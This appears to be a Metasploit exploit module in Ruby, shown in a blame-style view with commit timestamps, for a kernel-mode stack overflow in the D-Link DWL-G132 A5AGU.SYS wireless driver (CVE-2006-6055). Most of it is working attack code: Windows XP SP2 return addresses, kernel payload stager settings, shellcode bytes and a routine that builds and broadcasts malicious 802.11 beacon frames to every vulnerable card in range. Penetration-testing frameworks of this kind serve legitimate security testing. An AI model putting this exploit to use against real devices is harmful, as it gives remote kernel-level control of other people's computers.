2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-03-01 08:21:36 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = LowRanking
|
2006-11-13 17:03:34 +00:00
|
|
|
|
2009-10-23 15:59:13 +00:00
|
|
|
include Msf::Exploit::Lorcon2
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::KernelMode
|
2006-11-13 17:03:34 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2006-11-13 17:03:34 +00:00
|
|
|
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
|
|
|
'Description' => %q{
|
2010-04-30 08:40:19 +00:00
|
|
|
This module exploits a stack overflow in the A5AGU.SYS driver provided
|
|
|
|
with the D-Link DWL-G132 USB wireless adapter. This stack overflow
|
|
|
|
allows remote code execution in kernel mode. The stack overflow is triggered
|
|
|
|
when a 802.11 Beacon frame is received that contains a long Rates information
|
|
|
|
element. This exploit was tested with version 1.0.1.41 of the
|
|
|
|
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
|
|
|
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
|
|
|
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
|
|
|
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
|
|
|
all cards within range of the attack will be affected. The tested adapter used
|
|
|
|
a MAC address in the range of 00:11:95:f2:XX:XX.
|
|
|
|
|
|
|
|
Vulnerable clients will need to have their card in a non-associated state
|
|
|
|
for this exploit to work. The easiest way to reproduce this bug is by starting
|
|
|
|
the exploit and then accessing the Windows wireless network browser and
|
|
|
|
forcing it to refresh.
|
|
|
|
|
|
|
|
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
|
|
|
database indicates that D-Link has not provided an official patch or
|
|
|
|
solution for any of the seven flaws listed at the time of writing:
|
|
|
|
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
|
|
|
|
|
|
|
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
|
|
|
|
DWL-G132 driver (v1.21).
|
|
|
|
|
|
|
|
This module depends on the Lorcon2 library and only works on the Linux platform
|
|
|
|
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
|
|
|
(external/ruby-lorcon/README) for more information.
|
2006-11-13 17:03:34 +00:00
|
|
|
},
|
2010-04-30 08:40:19 +00:00
|
|
|
'Author' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
[
|
|
|
|
'hdm', # discovery, exploit dev
|
|
|
|
'skape', # windows kernel ninjitsu
|
2009-09-27 21:33:07 +00:00
|
|
|
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
|
2006-11-13 17:03:34 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2006-11-13 17:03:34 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2009-06-07 20:20:42 +00:00
|
|
|
['CVE', '2006-6055'],
|
|
|
|
['OSVDB', '30296'],
|
2006-11-16 06:00:21 +00:00
|
|
|
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
|
2006-11-13 17:03:34 +00:00
|
|
|
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
# Its a beautiful day in the neighborhood...
|
|
|
|
'Space' => 1000
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
2010-04-30 08:40:19 +00:00
|
|
|
'Targets' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
[
|
|
|
|
# Windows XP SP2 with the latest updates
|
|
|
|
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
|
|
|
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
|
|
|
|
{
|
|
|
|
'Ret' => 0x8066662c, # jmp edi
|
|
|
|
'Platform' => 'win',
|
2010-04-30 08:40:19 +00:00
|
|
|
'Payload' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
{
|
2010-04-30 08:40:19 +00:00
|
|
|
'ExtendedOptions' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
{
|
|
|
|
'Stager' => 'sud_syscall_hook',
|
|
|
|
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
|
|
'Recovery' => 'idlethread_restart',
|
|
|
|
'KiIdleLoopAddress' => 0x804dbb27,
|
|
|
|
}
|
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
}
|
2006-11-13 17:03:34 +00:00
|
|
|
],
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
# Windows XP SP2 install media, no patches
|
|
|
|
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
|
|
|
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
|
|
|
|
{
|
|
|
|
'Ret' => 0x804f16eb, # jmp edi
|
|
|
|
'Platform' => 'win',
|
2010-04-30 08:40:19 +00:00
|
|
|
'Payload' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
{
|
2010-04-30 08:40:19 +00:00
|
|
|
'ExtendedOptions' =>
|
2006-11-13 17:03:34 +00:00
|
|
|
{
|
|
|
|
'Stager' => 'sud_syscall_hook',
|
|
|
|
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
|
|
|
'Recovery' => 'idlethread_restart',
|
|
|
|
'KiIdleLoopAddress' => 0x804dc0c7,
|
|
|
|
}
|
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
}
|
|
|
|
]
|
2006-11-13 17:03:34 +00:00
|
|
|
],
|
2010-04-30 08:40:19 +00:00
|
|
|
'DefaultTarget' => 0))
|
2006-11-13 17:03:34 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
|
|
|
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
|
|
|
], self.class)
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
def exploit
|
|
|
|
open_wifi
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
stime = Time.now.to_i
|
|
|
|
rtime = datastore['RUNTIME'].to_i
|
|
|
|
count = 0
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
2010-04-30 08:40:19 +00:00
|
|
|
while (stime + rtime > Time.now.to_i)
|
2006-11-13 17:03:34 +00:00
|
|
|
wifi.write(create_beacon)
|
|
|
|
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
count += 1
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
# Exit if we get a session
|
|
|
|
break if session_created?
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
print_status("Completed sending beacons.")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2006-11-15 21:23:03 +00:00
|
|
|
#
|
|
|
|
# The following research was provided by Gil Dabah of ZERT
|
2006-11-13 17:03:34 +00:00
|
|
|
#
|
|
|
|
# The long rates field bug can be triggered three different ways (at least):
|
|
|
|
# 1) Send a single rates IE with valid rates up front and long data
|
2006-11-15 21:23:03 +00:00
|
|
|
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
2006-11-13 17:03:34 +00:00
|
|
|
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
|
|
|
#
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
def create_beacon
|
|
|
|
|
2007-03-01 08:21:36 +00:00
|
|
|
ssid = rand_text_alphanumeric(6)
|
|
|
|
bssid = ("\x00" * 2) + rand_text(4)
|
2006-11-13 17:03:34 +00:00
|
|
|
src = ("\x90" * 4) + "\xeb\x2b"
|
|
|
|
seq = [rand(255)].pack('n')
|
|
|
|
|
2007-03-01 08:21:36 +00:00
|
|
|
buff = rand_text(75)
|
2006-11-13 17:03:34 +00:00
|
|
|
buff[0, 2] = "\xeb\x49"
|
|
|
|
buff[71, 4] = [target.ret].pack('V')
|
2006-12-03 17:46:34 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
frame =
|
|
|
|
"\x80" + # type/subtype
|
|
|
|
"\x00" + # flags
|
2010-04-30 08:40:19 +00:00
|
|
|
"\x00\x00" + # duration
|
2006-11-15 21:23:03 +00:00
|
|
|
eton(datastore['ADDR_DST']) + # dst
|
2006-11-13 17:03:34 +00:00
|
|
|
src + # src
|
2006-11-15 21:23:03 +00:00
|
|
|
bssid + # bssid
|
2010-04-30 08:40:19 +00:00
|
|
|
seq + # seq
|
2007-03-01 08:21:36 +00:00
|
|
|
rand_text(8) + # timestamp value
|
2006-11-13 17:03:34 +00:00
|
|
|
"\x64\x00" + # beacon interval
|
|
|
|
"\x00\x05" + # capability flags
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
# ssid tag
|
|
|
|
"\x00" + ssid.length.chr + ssid +
|
|
|
|
|
|
|
|
# supported rates
|
|
|
|
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
|
|
|
|
|
|
# current channel
|
|
|
|
"\x03" + "\x01" + channel.chr +
|
|
|
|
|
|
|
|
# eip was his name-o
|
2010-04-30 08:40:19 +00:00
|
|
|
"\x01" + buff.length.chr + buff +
|
2006-11-13 17:03:34 +00:00
|
|
|
|
|
|
|
payload.encoded
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-13 17:03:34 +00:00
|
|
|
return frame
|
|
|
|
end
|
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|